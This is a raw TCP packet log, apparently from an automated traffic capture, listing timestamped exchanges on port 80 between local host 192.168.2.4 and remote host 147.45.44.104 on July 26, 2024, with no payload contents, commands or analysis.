Jul 26, 2024 18:56:48.548412085 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.548424006 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.548433065 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.548434019 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.548449993 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.548471928 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.548877954 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.548890114 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.548899889 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.548911095 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.548919916 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.548921108 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.548933983 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.548944950 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.548944950 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.548963070 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.548973083 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.548973083 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.548994064 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.549017906 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.549647093 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.549659014 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.549669981 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.549680948 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.549691916 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.549691916 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.549705982 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.549715996 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.549724102 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.549729109 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.549741983 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.549748898 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.549753904 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.549766064 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.549792051 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.549968004 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.549979925 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.549993038 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.550002098 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.550007105 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.550019026 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.550029993 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.550059080 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.550934076 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.550946951 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.550957918 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.550970078 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.550981998 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.550992966 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.550992012 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.551007032 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.551028013 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.551040888 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.552139044 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.552153111 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.552165031 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.552175999 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.552186966 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.552186966 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.552223921 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.552234888 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.552655935 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.552669048 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.552680016 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.552690983 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.552701950 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.552704096 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.552715063 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.552726984 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.552735090 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.552748919 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.552753925 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.552753925 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.552778006 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.552799940 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.553380013 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.553396940 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.553409100 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.553421021 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.553422928 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.553433895 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.553440094 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.553446054 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.553457975 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.553459883 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.553473949 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.553484917 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.553486109 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.553500891 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.553528070 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.554125071 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.554164886 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.554174900 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.554188013 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.554198980 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.554203033 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.554210901 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.554220915 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.554239035 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.554263115 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.554961920 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.554974079 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.554986000 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.555006027 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.555031061 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.555712938 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.555726051 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.555736065 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.555747032 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.555757999 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.555763006 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.555788040 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.555803061 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.556548119 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.556560993 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.556571007 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.556581020 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.556591988 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.556593895 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.556606054 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.556617022 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.556637049 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.557203054 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.557215929 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.557228088 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.557240963 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.557250023 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.557251930 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.557261944 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.557269096 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.557277918 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.557286978 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.557291031 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.557306051 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.557312965 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.557337999 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.558320999 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.558332920 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.558343887 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.558356047 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.558367968 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.558383942 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.558546066 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.558558941 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.558568954 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.558578968 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.558584929 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.558588028 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.558590889 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.558610916 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.558620930 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.558624029 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.558634996 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.558645964 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.558648109 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.558660030 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.558672905 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.558696985 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.559657097 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.559669018 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.559684992 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.559695959 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.559704065 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.559709072 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.559721947 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.559732914 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.559734106 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.559745073 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.559756041 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.559757948 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.559767008 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.559776068 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.559789896 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.559814930 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.560535908 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.560548067 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.560558081 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.560570002 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.560581923 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.560585022 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.560594082 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.560604095 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.560606956 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.560616016 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.560621977 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.560626984 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.560637951 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.560650110 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.560674906 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.561517000 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.561528921 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.561539888 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.561551094 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.561562061 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.561563969 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.561574936 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.561578035 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.561587095 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.561595917 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.561599970 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.561621904 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.561640978 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.561650038 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.561678886 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.562504053 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.562515020 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.562524080 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.562532902 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.562544107 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.562553883 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.562565088 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.562572002 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.562572002 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.562587023 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.562604904 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.563466072 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.563513041 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.563517094 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.563554049 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.563596010 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.563611031 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.563621044 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.563631058 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.563646078 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.564399958 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.564435005 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.564445019 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.564451933 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.564455986 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.564466953 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.564471960 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.564479113 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.564498901 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.564502001 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.564512014 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.564512968 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.564527035 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.564534903 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.564537048 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.564562082 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.564575911 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.565378904 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.565392017 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.565401077 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.565412045 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.565423012 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.565426111 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.565434933 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.565447092 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.565455914 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.565458059 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.565469980 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.565470934 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.565483093 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.565495014 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.565521002 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.566287041 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.566298962 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.566308975 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.566320896 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.566334009 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.566346884 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.566349983 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.566359997 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.566370010 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.566380978 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.566391945 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.566405058 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.566416025 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.566493034 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.567265034 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.567276955 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.567286968 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.567300081 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.567310095 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.567313910 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.567322969 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.567331076 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.567334890 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.567347050 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.567348957 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.567361116 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.567370892 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.567373037 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.567400932 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.567409039 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.568244934 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.568258047 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.568268061 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.568279028 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.568289042 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.568300962 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.568300962 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.568312883 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.568325043 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.568325996 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.568336964 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.568342924 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.568348885 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.568373919 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.568392038 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.569195032 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.569205999 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.569216967 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.569227934 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.569241047 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.569241047 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.569252968 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.569262028 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.569264889 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.569277048 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.569286108 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.569288015 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.569300890 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.569310904 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.569317102 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.569324017 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.569363117 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.570218086 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.570230007 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.570240974 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.570254087 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.570262909 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.570264101 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.570275068 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.570281029 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.570288897 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.570301056 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.570310116 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.570311069 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.570324898 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.570333004 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.570349932 CEST	49757	80	192.168.2.4	147.45.44.104
